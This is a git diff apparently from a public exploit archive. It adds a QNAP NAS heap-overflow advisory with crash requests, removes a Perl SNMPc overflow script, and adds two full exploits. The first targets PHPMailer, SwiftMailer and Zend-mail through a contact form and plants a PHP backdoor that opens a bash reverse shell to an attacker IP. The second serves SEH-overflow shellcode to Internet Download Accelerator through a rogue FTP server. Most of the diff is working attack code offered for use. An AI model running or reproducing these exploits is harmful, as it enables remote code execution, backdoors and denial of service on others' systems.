--- /dev/null
+++ b/platforms/linux/dos/40985.txt
@@ -0,0 +1,333 @@
+==================
+
+1) [Heap overflow]
+
+==================
+
+Path: /home/httpd/cgi-bin/cgi.cgi
+
+u = valid user [guest|admin]
+
+1.1)
+
+/* Remote */
+
+[Remote host]# echo -en "GET /cgi-bin/cgi.cgi?u=admin&p=`for((i=0;i<263;i++));do echo -en "A";done` HTTP/1.0\nHost: QNAP\n\n" | ncat --ssl 192.168.5.7 443
+
+HTTP/1.1 200 OK
+
+Date: Sat, 31 Dec 2016 00:01:11 GMT
+
+*** glibc detected *** cgi.cgi: free(): invalid next size (normal): 0x0806cec8 ***
+
+======= Backtrace: =========
+
+======= Memory map: ========
+
+08048000-08069000 r-xp 00000000 00: 0e 7559 /home/httpd/cgi-bin/authLogin.cgi
+
+08069000-0806b000 rw-p 00020000 00: 0e 7559 /home/httpd/cgi-bin/authLogin.cgi
+
+0806b000-0808c000 rw-p 00000000 00: 00 0 [heap]
+
+[====SNIP====]
+
+ffe53000-ffe54000 rw-p 00000000 00: 00 0
+
+Content-Length: 0
+
+Connection: close
+
+Content-Type: text/plain
+
+[Remote host]#
+
+=======
+
+1.2)
+
+/* Local test, to get more info from backtrace */
+
+# export QUERY_STRING="u=admin&p=`for((i=0;i<263;i++));do echo -en "A";done`"
+
+# ./cgi.cgi
+
+*** glibc detected *** ./cgi.cgi: free(): invalid next size (normal): 0x0806cec8 ***
+
+======= Backtrace: =========
+
+/lib/libc.so.6[0xf6c3da62]
+
+/lib/libc.so.6(cfree+0x89)[0xf6c3f729]
+
+/lib/libc.so.6(fclose+0x136)[0xf6c2e5c6]
+
+/lib/libnss_compat.so.2[0xf6b8ac25]
+
+/lib/libnss_compat.so.2(_nss_compat_getspnam_r+0xb2)[0xf6b8b282]
+
+/lib/libc.so.6(getspnam_r+0x77)[0xf6c9ef57]
+
+/lib/libc.so.6(getspnam+0x78)[0xf6c9e3f8]
+
+/usr/lib/libuLinux_NAS.so.0(Check_Local_User_Password+0x16c)[0xf7518972]
+
+/usr/lib/libuLinux_NAS.so.0(Check_System_User_Password+0x56)[0xf7518f66]
+
+/usr/lib/libuLinux_NAS.so.0(Check_NAS_Administrator_Password+0x24)[0xf75
+19098]
+
+./cgi.cgi[0x80502ed]
+
+./cgi.cgi[0x8051a7e]
+
+/lib/libc.so.6(__libc_start_main+0xe0)[0xf6bedf90]
+
+./cgi.cgi[0x804d151]
+
+======= Memory map: ========
+
+08048000-08069000 r-xp 00000000 00:0e 7559 /home/httpd/cgi-bin/authLogin.cgi
+
+08069000-0806b000 rw-p 00020000 00:0e 7559 /home/httpd/cgi-bin/authLogin.cgi
+
+0806b000-0808c000 rw-p 00000000 00:00 0 [heap]
+
+[====SNIP====]
+
+ffd9e000-ffdbe000 rwxp 00000000 00:00 0 [stack]
+
+ffdbe000-ffdbf000 rw-p 00000000 00:00 0
+
+Aborted
+
+#
+
+1.3)
+
+# export QUERY_STRING="u=admin&p=`for((i=0;i<5957;i++));do echo -en "A";done`"
+
+# ./cgi.cgi
+
+*** glibc detected *** : free(): invalid next size (normal): 0x0806e508 ***
+
+======= Backtrace: =========
+
+/lib/libc.so.6[0xf6c9da62]
+
+/lib/libc.so.6(cfree+0x89)[0xf6c9f729]
+
+/lib/libc.so.6(fclose+0x136)[0xf6c8e5c6]
+
+/lib/libnss_compat.so.2[0xf6beac25]
+
+/lib/libnss_compat.so.2(_nss_compat_getspnam_r+0xb2)[0xf6beb282]
+
+/lib/libc.so.6(getspnam_r+0x77)[0xf6cfef57]
+
+/lib/libc.so.6(getspnam+0x78)[0xf6cfe3f8]
+
+/usr/lib/libuLinux_NAS.so.0(Check_Local_User_Password+0x16c)[0xf7578972]
+
+/usr/lib/libuLinux_NAS.so.0(Check_System_User_Password+0x56)[0xf7578f66]
+
+/usr/lib/libuLinux_NAS.so.0(Check_NAS_Administrator_Password+0x24)[0xf75
+79098]
+
+[0x80502ed]
+
+[0x0]
+
+======= Memory map: ========
+
+08048000-08069000 r-xp 00000000 00:0e 6705 /home/httpd/cgi-bin/authLogin.cgi
+
+08069000-0806b000 rw-p 00020000 00:0e 6705 /home/httpd/cgi-bin/authLogin.cgi
+
+0806b000-0808c000 rw-p 00000000 00:00 0 [heap]
+
+[====SNIP====]
+
+# ./cgi.cgi
+
+Segmentation fault
+
+#
+
+# dmesg
+
+[====SNIP====]
+
+[ 2185.562493] cgi.cgi[17772]: segfault at ff9a4010 ip 00000000f6bd75c3 sp 00000000ff99f1bc error 4 in libc-2.6.1.so[f6b6b000+12d000]
+
+[====SNIP====]
+
+/* Local as shown below, but can of course be called from remote */
+
+==================
+
+2) [STACK junk]
+
+==================
+
+# export QUERY_STRING="bug"
+
+# ./jc.cgi
+
+Segmentation fault
+
+# dmesg
+
+[====SNIP====]
+
+[76277.192562] jc.cgi[18159]: segfault at 0 ip 00000000f6cbdffc sp 00000000ffeddbbc error 4 in libc-2.6.1.so[f6c52000+12d000]
+
+[====SNIP====]
+
+==================
+
+3) [STACK junk]
+
+==================
+
+/* Local as shown, but can be called from remote */
+
+# export QUERY_STRING="bug"
+
+# ./mediaGet.cgi
+
+Segmentation fault
+
+# dmesg
+
+[====SNIP====]
+
+[76802.837766] mediaGet.cgi[6589]: segfault at 0 ip 00000000f6bd8ffc sp 00000000ffc0498c error 4 in libc-2.6.1.so[f6b6d000+12d000]
+
+[====SNIP====]
+
+Have a nice day (and happy new year)
+
+/bashis
+
+========================
+
+Hello mcw (at) noemail (dot) eu [email concealed],
+
+We're writing to let you know that the group you tried to contact (security) may not exist, or you may not have permission to post messages to the group. A few more details on why you weren't able to post:
+
+* You might have spelled or formatted the group name incorrectly.
+
+* The owner of the group may have removed this group.
+
+* You may need to join the group before receiving permission to post.
+
+* This group may not be open to posting.
+
+If you have questions related to this or any other Google Group, visit the Help Center at https://support.google.com/a/qnap.com/bin/topic.py?topic=25838.
+
+Thanks,
+
+qnap.com admins
+
+----- Original message -----
+
+X-Received: by 10.99.242.5 with SMTP id v5mr94097752pgh.181.1483213806030;
+
+Sat, 31 Dec 2016 11:50:06 -0800 (PST)
+
+Return-Path: <mcw (at) noemail (dot) eu [email concealed]>
+
+Received: from qnappm.info (mail2.qnappm.info. [113.196.50.102])
+
+by mx.google.com with ESMTP id c74si60891262pfk.272.2016.12.31.11.50.05
+
+for <security (at) qnap (dot) com [email concealed]>;
+
+Sat, 31 Dec 2016 11:50:06 -0800 (PST)
+
+Received-SPF: fail (google.com: domain of mcw (at) noemail (dot) eu [email concealed] does not designate 113.196.50.102 as permitted sender) client-ip=113.196.50.102;
+
+Authentication-Results: mx.google.com;
+
+spf=fail (google.com: domain of mcw (at) noemail (dot) eu [email concealed] does not designate 113.196.50.102 as permitted sender) smtp.mailfrom=mcw (at) noemail (dot) eu [email concealed]
+
+X-AuthUser: qnap1688 (at) qnappm (dot) info [email concealed]
+
+Received: from aid.qnap.com ([113.196.50.99]:36962)
+
+by mail2.qnappm.info with [XMail 1.27 ESMTP Server]
+
+id <S7F885> for <security (at) qnap (dot) com [email concealed]> from <mcw (at) noemail (dot) eu [email concealed]>;
+
+Sun, 1 Jan 2017 04:13:48 +0800
+
+Date: Sun, 1 Jan 2017 03:50:06 +0800
+
+Return-Path: mcw (at) noemail (dot) eu [email concealed]
+
+To: security (at) qnap (dot) com [email concealed]
+
+From: bashis mcw <mcw (at) noemail (dot) eu [email concealed]>
+
+Subject: Reporting Security Issues - [Critical] QNAP NAS devices suffer of Heap Overflow!
+
+Message-ID: <5acc9d206d9601dc574a02b114c83e8a (at) aid.qnap (dot) com [email concealed]>
+
+X-Priority: 3
+
+X-Mailer: PHPMailer 5.1 (phpmailer.sourceforge.net)
+
+MIME-Version: 1.0
+
+Content-Type: multipart/alternative;
+
+boundary="b1_5acc9d206d9601dc574a02b114c83e8a"
+
+Category : Administration
+
+Subject : QNAP NAS devices suffer of Heap Overflow!
+
+Severity Level : Critical
+
+Description :
+
+Greetings gents,
+
+QNAP NAS devices suffer from a critical Heap Overflow in "cgi.cgi" and
+
+non critical stack crash in "jc.cgi and mediaGet.cgi".
+
+Successful exploitation of this heap overflow vulnerability can lead to
+
+unauthorised root (admin) privileges on QNAP devices with anonymous
+
+access. (no credential needed to exploit)
+
+Please note: 1st February 2017 i will release details of these bugs to
+
+Full Disclosure and Bugtraq e-mail lists.
+
+Please see below and attached.
+
+Have a nice day (and happy new year)
+
+/bashis
+
+==================
+
+1) [HEAP overflow]
+
+==================
+
+Path: /home/httpd/cgi-bin/cgi.cgi
+
+u = valid user [guest|admin]
+
+1.1)
+
+/* Remote */
+
+[Remote host]# echo -en "GET /cgi-bin/cgi.cgi?u=admin&p=`for((i=0;i
+
+Sign Time : 2017/01/01 03:50:06
\ No newline at end of file
diff --git a/platforms/multiple/remote/31715.pl b/platforms/multiple/remote/31715.pl
deleted file mode 100755
index 40b4907a3..000000000
--- a/platforms/multiple/remote/31715.pl
+++ /dev/null
@@ -1,70 +0,0 @@
-source: http://www.securityfocus.com/bid/28990/info
-
-Castle Rock Computing SNMPc is prone to a stack-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input.
-
-Attackers can leverage this issue to execute arbitrary code in the context of the application, which typically runs with LocalSystem privileges. Successful exploits will compromise affected computers. Failed attacks will likely cause denial-of-service conditions.
-
-Versions prior to SNMPc 7.1.1 are vulnerable. 
-
-#!usr/bin/perl -w
-
-################################################################################################################
-#    Stack-based buffer overflow in the Network Manager in Castle Rock Computing SNMPc 7.1 and
-#    earlier allows remote attackers to cause a denial of service (crash) or execute arbitrary code
-#    via a long community string in an SNMP TRAP packet.
-#
-#    Refer:
-#    http://web.nvd.nist.gov/view/vuln/detail?execution=e3s1
-#    http://www.securityfocus.com/bid/28990/discuss
-#
-#
-#    To run this exploit on MS Windows replace "#!usr/bin/perl -w" with "#!Installation_path_for_perl -w"
-#    (say #!C:/Program Files/Perl/bin/perl -w)
-#
-#     This was strictly written for educational purpose. Use it at your own risk.
-#    Author will not bare any responsibility for any damages watsoever.
-#
-#        Author:    Praveen Darshanam
-#        Email:    praveen[underscore]recker[at]sify.com
-#        Date:    11th November, 2008
-#
-#    NOTE:    Thanks to all my colleagues at iPolicy
-#            For reliable security solutions please visit http://www.ipolicynetworks.com/
-#
-##################################################################################################################
-
-use Net::SNMP;
-
-printf("Enter the IP Adress of Vulnerable SNMP Manager ");
-$host_vulnerable = <STDIN>;
-$port = 162;
-$community = "D" x 19500;
-
-($session, $error) = Net::SNMP->session(
-                                               -hostname      => $host_vulnerable,
-                                               -port          => $port,
-                                               -community     => $community,   # v1/v2c
-                                             -maxmsgsize    => 65535,
-                                        );
- if (!defined($session))
- {
-      printf("ERROR: %s.\n", $error);
-      exit 1;
- }
-
-$ipaddress = "172.16.16.4";
-#Throwing an error without Agent so randomly assigned value to $ipaddress
-
-$result = $session->trap(
-                              -agentaddr       => $ipaddress,
-                           );
-
-if (!defined($result))
-{
-     printf("ERROR: %s.\n", $session->error);
-     $session->close;
-     exit 1;
-}
-
-$session->close;
-
diff --git a/platforms/php/webapps/40986.py b/platforms/php/webapps/40986.py
new file mode 100755
index 000000000..9a5eb6a3d
--- /dev/null
+++ b/platforms/php/webapps/40986.py
@@ -0,0 +1,208 @@
+#!/usr/bin/python
+
+intro = """\033[94m 
+    __                     __   __  __           __                 
+   / /   ___  ____ _____ _/ /  / / / /___ ______/ /_____  __________
+  / /   / _ \/ __ `/ __ `/ /  / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/
+ / /___/  __/ /_/ / /_/ / /  / __  / /_/ / /__/ ,< /  __/ /  (__  ) 
+/_____/\___/\__, /\__,_/_/  /_/ /_/\__,_/\___/_/|_|\___/_/  /____/  
+           /____/                                                   
+
+
+PHPMailer / Zend-mail / SwiftMailer - Remote Code Execution Exploit
+		     a.k.a "PwnScriptum"
+
+ CVE-2016-10033 + CVE-2016-10045 + CVE-2016-10034 + CVE-2016-10074
+
+
+This PoC exploit aims to execute a reverse shell on the target in 
+the context of the web-server user via vulnerable PHP email library.
+
+
+Discovered and Coded by:
+
+\033[1;34m 
+ Dawid Golunski
+ https://legalhackers.com
+
+ t: @dawid_golunski for updates
+\033[0m
+\033[94m 
+P.$. For testing only! Don't break the Web ;) 
+\033[0m
+"""
+info = """
+[Version]
+Limited (ver. 1.0)
+
+[PoC Video]
+See the the exploit in action at:
+
+https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html
+
+[Info]
+This exploit targets a common webapp component - Contact Form. 
+
+It combines payloads for the following vulns:
+
+1. PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033)
+https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
+
+2. PHPMailer < 5.2.20 Remote Code Execution (CVE-2016-10045 / escapeshell bypass)
+https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln.html
+
+3. SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074)
+https://legalhackers.com/advisories/SwiftMailer-Exploit-Remote-Code-Exec-CVE-2016-10074-Vuln.html
+
+4. Zend Framework / zend-mail < 2.4.11 - Remote Code Execution (CVE-2016-10034)
+https://legalhackers.com/advisories/ZendFramework-Exploit-ZendMail-Remote-Code-Exec-CVE-2016-10034-Vuln.html
+
+[Usage]
+
+./PwnScriptum_RCE_exploit.py [-h] -url WEBAPP_BASE_URL -cf CONTACT_SCRIPT
+                                  [-d TARGET_UP_DIR] -ip ATTACKERS_IP
+                                  [-p ATTACKERS_PORT] [--version]
+                                  [--post-action POST_ACTION]
+                                  [--post-name POST_NAME]
+                                  [--post-email POST_EMAIL]
+                                  [--post-msg POST_MSG]
+
+Note, make sure the contact form matches the default field names (send/name/email/msg). 
+Otherwise override with --post-msg=message_box for example.
+
+"""
+
+import os
+import argparse
+import time
+import urllib
+import urllib2
+import socket
+import sys
+
+
+# The Main Meat
+print intro
+
+# Show info
+if '-H' in sys.argv:
+	print info
+	exit(0)
+# Parse input args
+parser = argparse.ArgumentParser(prog='PwnScriptum_RCE_exploit.py', description='PHPMailer / Zend-mail / SwiftMailer - RCE Exploit (a.k.a \'PwnScriptum\')\nDiscovered by Dawid Golunski (https://legalhackers.com)')
+parser.add_argument('-H', action='store_true', default="false", required=False,    help='Full Help / Info Page')
+parser.add_argument('-url', dest='WEBAPP_BASE_URL', required=True,  help='WebApp Base Url')
+parser.add_argument('-cf',  dest='CONTACT_SCRIPT',  required=True,  help='Contact Form scriptname')
+parser.add_argument('-d' ,  dest='TARGET_UP_DIR',   required=False, help='Target Upload Dir')
+parser.add_argument('-ip',  dest='ATTACKERS_IP',    required=True,  help='Attackers Public IP for RevShell')
+parser.add_argument('-p',   dest='ATTACKERS_PORT',  required=False, help='Attackers Port for RevShell listener')
+parser.add_argument('--version', action='version', version='%(prog)s 1.0 Limited edition')
+parser.add_argument('--post-action', dest='POST_ACTION',  required=False, help='Overrides POST "action" field name',         default="send")
+parser.add_argument('--post-name',   dest='POST_NAME',    required=False, help='Overrides POST "name of sender" field name', default="name")
+parser.add_argument('--post-email',  dest='POST_EMAIL',   required=False, help='Overrides POST "email" field name',          default="email")
+parser.add_argument('--post-msg',    dest='POST_MSG',     required=False, help='Overrides POST "message" field name',        default="msg")
+args = parser.parse_args()
+
+# Preset vars
+TMOUT = 3
+# Set Vars
+if args.ATTACKERS_PORT is None:
+	args.ATTACKERS_PORT = 8080
+if args.TARGET_UP_DIR  is None:
+	args.TARGET_UP_DIR = "upload"
+# Build the target backdoor URL here (note the "random" pid bit to avoid php code collisions on multiple runs / multiple phpfile appends ;)
+BACKDOOR_FILE = 'phpbackdoor' + str(os.getpid()) + '.php'
+BACKDOOR_URL  = args.WEBAPP_BASE_URL + '/' + args.TARGET_UP_DIR + '/' + BACKDOOR_FILE
+CONTACT_SCRIPT_URL = args.WEBAPP_BASE_URL + args.CONTACT_SCRIPT
+
+# Show params
+print """[+] Setting vars to: \n
+WEBAPP_BASE_URL     = [%s]
+CONTACT_SCRIPT      = [%s]
+TARGET_UP_DIR       = [%s]
+ATTACKERS_IP        = [%s]
+ATTACKERS_PORT      = [%s]
+CONTACT_SCRIPT_URL  = [%s]
+BACKDOOR_FILEl      = [%s]
+""" % (args.WEBAPP_BASE_URL, args.CONTACT_SCRIPT, args.TARGET_UP_DIR, args.ATTACKERS_IP, args.ATTACKERS_PORT, CONTACT_SCRIPT_URL, BACKDOOR_FILE)
+
+
+print "[+] Choose your target / payload: "
+print "\033[1;34m"
+print """[1] PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033)\n"""
+print """[2] PHPMailer < 5.2.20 Remote Code Execution (CVE-2016-10045)
+	        The escapeshellarg() bypass :)\n"""
+print """[3] SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074)\n"""
+print """[4] Zend Framework / zend-mail < 2.4.11 - Remote Code Execution (CVE-2016-10034)\n"""
+print "\033[0m"
+
+try:
+    target = int(raw_input('[?] Select target [1-2]: '))
+except ValueError:
+    print "Not a valid choice. Exiting\n"
+    exit(2)
+if (target>4):
+    print "No such target. Exiting\n"
+    exit(3)
+if target == 1:
+	# PHPMailer < 5.2.18 Remote Code Execution PoC Exploit (CVE-2016-10033)
+	payload = '"attacker\\" -oQ/tmp/ -X%s/%s some"@email.com' % (args.TARGET_UP_DIR, BACKDOOR_FILE)
+if target == 2:
+	# Bypass / PHPMailer < 5.2.20 Remote Code Execution PoC Exploit (CVE-2016-10045)
+	payload = "\"attacker\\' -oQ/tmp/ -X%s/%s  some\"@email.com" % (args.TARGET_UP_DIR, BACKDOOR_FILE)
+if target == 3:
+	# SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074)
+        payload = '"attacker\\" -oQ/tmp/ -X%s/%s "@email.com' % (args.TARGET_UP_DIR, BACKDOOR_FILE)
+if target == 4:
+	# Zend Framework / zend-mail < 2.4.11 - Remote Code Execution (CVE-2016-10034)
+        payload = '"attacker\\" -oQ/tmp/ -X%s/%s "@email.com' % (args.TARGET_UP_DIR, BACKDOOR_FILE)
+
+print "\n[+] Generated mail() payload will upload the backdoor into the '%s' dir\n" % args.TARGET_UP_DIR
+# PHP RCE code to be saved into the backdoor php file on the target in TARGET_UP_DIR. E.g:
+# e.g: 
+#RCE_PHP_CODE = "<?php phpinfo(); ?>" 
+RCE_PHP_CODE = """<?php sleep(%d); system("/bin/bash -c 'nohup bash -i >/dev/tcp/%s/%s 0<&1 2>&1' ");  ?>""" % (TMOUT, args.ATTACKERS_IP, args.ATTACKERS_PORT) 
+
+# The form names might need to be adjusted
+post_fields = {'action': "%s" % args.POST_ACTION, "%s" % args.POST_NAME: 'Jas Fasola', "%s" % args.POST_EMAIL: payload, "%s" % args.POST_MSG: RCE_PHP_CODE}
+
+# Attack
+# Inject payload into PHPMailer / mail() via a Contact form. This should write out the backdoor
+print "[+] Backdoor upload via the contact form at '%s'\n" % CONTACT_SCRIPT_URL
+data = urllib.urlencode(post_fields)
+req = urllib2.Request(CONTACT_SCRIPT_URL, data)
+response = urllib2.urlopen(req)
+the_page = response.read()
+
+
+# Check if the backdoor was uploaded correctly.
+# A little trick here. The urlopen should timeout at sleep(X)-1 if the backdoor ran fine
+# So we catch the timeout to find out.
+
+# Is it uploaded ? Try to execute the PHP backdoor and the Reverse Shell within it
+print "[+] Checking for the backdoor at the URL '%s'\n" % BACKDOOR_URL
+got_timeout = 0
+http_err = 0
+try:
+    urllib2.urlopen(BACKDOOR_URL, timeout = (TMOUT-1))
+except urllib2.HTTPError as e:
+    http_err = e.code
+except socket.timeout as e:
+    print "[*] \033[1;32mLooking good!\033[0m The sleep() worked by the looks of it :) \nUrlopen timed out just in time for the shell :)\n"
+    got_timeout = 1
+
+if (got_timeout != 1):
+    print "[!] Something went wrong... Got error: [%d] \nTry another dir? Push through, don't give up! :)\n" % http_err
+    exit(2)
+
+# Spawn the shell and wait for the sleep() PHP call to finish before /bin/bash is called
+print "[+] We should get a shell if we got till here! Spawning netcat now! :)\n"
+print "[+] \033[1;34mPlease tell me you're seeing this too... ;)\033[0m\n"
+os.system("nc -v -l -p %d" % args.ATTACKERS_PORT)
+
+print "\n[+] Shell closed\n"
+
+print "\033[1;34mP.$. There's more to it :) Exiting, for now...\033[0m\n"
+
+
+
diff --git a/platforms/windows/remote/40984.py b/platforms/windows/remote/40984.py
new file mode 100755
index 000000000..e974f075f
--- /dev/null
+++ b/platforms/windows/remote/40984.py
@@ -0,0 +1,161 @@
+#!/usr/bin/python
+#
+# Exploit Title: IDA 6.10.1.1527 FTP SEH Universal exploit.
+# Exploit Author: Fady Mohamed Osman (@fady_osman)
+# Exploit-db : http://www.exploit-db.com/author/?a=2986
+# Youtube : https://www.youtube.com/user/cutehack3r
+# Date: Jan 2, 2017
+# Vendor Homepage: http://westbyte.com/
+# Software Link: http://westbyte.com/index.phtml?page=support&tmp=1&lng=English&product=Internet%20Download%20Accelerator.
+# Version: 6.10.1.1527
+# Tested on: IDA 6.10.1.1527 Free Version - Windows 7 SP1 - Windows 10.
+# --------------
+# Internet download accelerator suffers from a BOF when an FTP Download of file with
+# long name fails.
+# --------------
+# To Exploit this issue:
+# 1- Run HTTP server that will redirect to the FTP file with long name.
+# 2- The ftp server will answer to the commands sent then will open a data connection.
+# 3- The script will send an empty file list and close the connection to trigger the BOF condition.
+# 5- Happy new year :D.
+
+import SocketServer
+import threading
+
+
+# IP to listen to, needed to construct PASV response so 0.0.0.0 is not gonna work.
+ip = "192.168.1.100"
+ipParts = ip.split(".")
+PasvResp = "("+ ipParts[0]+ "," + ipParts[1]+ "," + ipParts[2] + "," + ipParts[3] + ",151,130)"
+# Run Calc.exe
+buf=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
+"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
+"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
+"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
+"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
+"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
+"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")
+
+
+
+
+
+class HTTPHandler(SocketServer.BaseRequestHandler):
+    """
+    The request handler class for our HTTP server.
+
+    This is just so we don't have to provide a suspicious FTP link with long name.
+    """
+
+    def handle(self):
+        # self.request is the TCP socket connected to the client
+        self.data = self.request.recv(1024).strip()
+        print "[*] Recieved HTTP Request"
+        print "[*] Sending Redirction To FTP"
+        # just send back the same data, but upper-cased
+	# SEH Offset 336 - 1056 bytes for the payload - 0x10011b53 unzip32.dll ppr 0x0c
+	payload = "ftp://192.168.1.100/"+ 'A' * 336 + "\xeb\x06\x90\x90" + "\x53\x1b\x01\x10" + buf + "B" * (1056 - len(buf))
+	self.request.sendall("HTTP/1.1 302 Found\r\n" +
+	"Host: Server\r\nConnection: close\r\nLocation: "+ 
+	payload+
+	"\r\nContent-type: text/html; charset=UTF-8\r\n\r\n")
+	print "[*] Redirection Sent..."
+
+class FTPHandler(SocketServer.BaseRequestHandler):
+    """
+    The request handler class for our FTP server.
+
+    This will work normally and open a data connection with IDA.
+    """
+
+    def handle(self):
+        # User Command
+	self.request.sendall("220 Nasty FTP Server Ready\r\n")
+	User = self.request.recv(1024).strip()
+        print "[*] Recieved User Command: " + User
+	self.request.sendall("331 User name okay, need password\r\n")	
+	# PASS Command
+        Pass = self.request.recv(1024).strip()
+        print "[*] Recieved PASS Command: " + Pass
+	self.request.sendall("230-Password accepted.\r\n230 User logged in.\r\n")
+        # SYST Command
+	Syst = self.request.recv(1024).strip()
+        print "[*] Recieved SYST Command: " + Syst
+	self.request.sendall("215 UNIX Type: L8\r\n")
+	# TYPE Command
+	Type = self.request.recv(1024).strip()
+	print "[*] Recieved Type Command: " + Type
+	self.request.sendall("200 Type set to I\r\n")
+	# REST command
+	Rest = self.request.recv(1024).strip()
+	print "[*] Recieved Rest Command: " + Rest
+	self.request.sendall("200 OK\r\n")
+	# CWD command
+	Cwd = self.request.recv(2048).strip()
+	print "[*] Recieved CWD Command: " + Cwd
+	self.request.sendall("250 CWD Command successful\r\n")
+	
+	# PASV command.
+	Pasv = self.request.recv(1024).strip()
+	print "[*] Recieved PASV Command: " + Pasv
+	self.request.sendall("227 Entering Passive Mode " + PasvResp + "\r\n")
+
+	#LIST	
+	List = self.request.recv(1024).strip()
+	print "[*] Recieved LIST Command: " + List
+	self.request.sendall("150 Here comes the directory listing.\r\n226 Directory send ok.\r\n")
+	
+	
+
+
+class FTPDataHandler(SocketServer.BaseRequestHandler):
+    """
+    The request handler class for our FTP Data connection.
+
+    This will send useless response and close the connection to trigger the error.
+    """
+
+    def handle(self):
+        # self.request is the TCP socket connected to the client
+        print "[*] Recieved FTP-Data Request"
+        print "[*] Sending Empty List"
+        # just send back the same data, but upper-cased
+	self.request.sendall("total 0\r\n\r\n")
+	self.request.close()
+
+
+if __name__ == "__main__":
+    HOST, PORT = ip, 8000
+    SocketServer.TCPServer.allow_reuse_address = True
+
+    print "[*] Starting the HTTP Server."
+    # Create the server, binding to localhost on port 8000
+    HTTPServer = SocketServer.TCPServer((HOST, PORT), HTTPHandler)
+
+    # Running the http server (using a thread so we can continue and listen for FTP and FTP-Data).
+    HTTPThread = threading.Thread(target=HTTPServer.serve_forever)
+    HTTPThread.daemon = True
+    HTTPThread.start()
+    
+    print "[*] Starting the FTP Server."
+    # Running the FTP server.
+    FTPServer = SocketServer.TCPServer((HOST, 21), FTPHandler)
+
+    # Running the FTP server thread.
+    FTPThread = threading.Thread(target=FTPServer.serve_forever)
+    FTPThread.daemon = True
+    FTPThread.start()
+
+    print "[*] Opening the data connection."
+    # Opening the FTP data connection - DON'T CHANGE THE PORT.
+    FTPData = SocketServer.TCPServer((HOST, 38786), FTPHandler)
+
+    # Running the FTP Data connection Thread.
+    DataThread = threading.Thread(target=FTPData.serve_forever)
+    DataThread.daemon = True
+    DataThread.start()
+
+    print "[*] Listening for FTP Data."
+    # Making the main thread wait.
+    print "[*] To exit the script please press any key at any time."
+    raw_input()